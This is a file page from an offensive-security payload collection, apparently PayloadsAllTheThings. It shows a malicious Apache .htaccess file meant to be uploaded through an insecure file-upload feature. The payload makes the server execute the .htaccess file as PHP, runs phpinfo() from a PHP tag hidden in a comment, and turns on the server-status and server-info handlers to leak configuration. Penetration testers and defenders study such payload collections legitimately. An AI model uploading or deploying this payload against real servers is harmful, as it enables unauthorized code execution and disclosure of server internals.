PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo

6 lines
113 B
Plaintext
Raw Normal View History

2020-09-27 09:16:50 +00:00
AddType application/x-httpd-php .htaccess
# <?php phpinfo(); ?>
SetHandler server-status
SetHandler server-info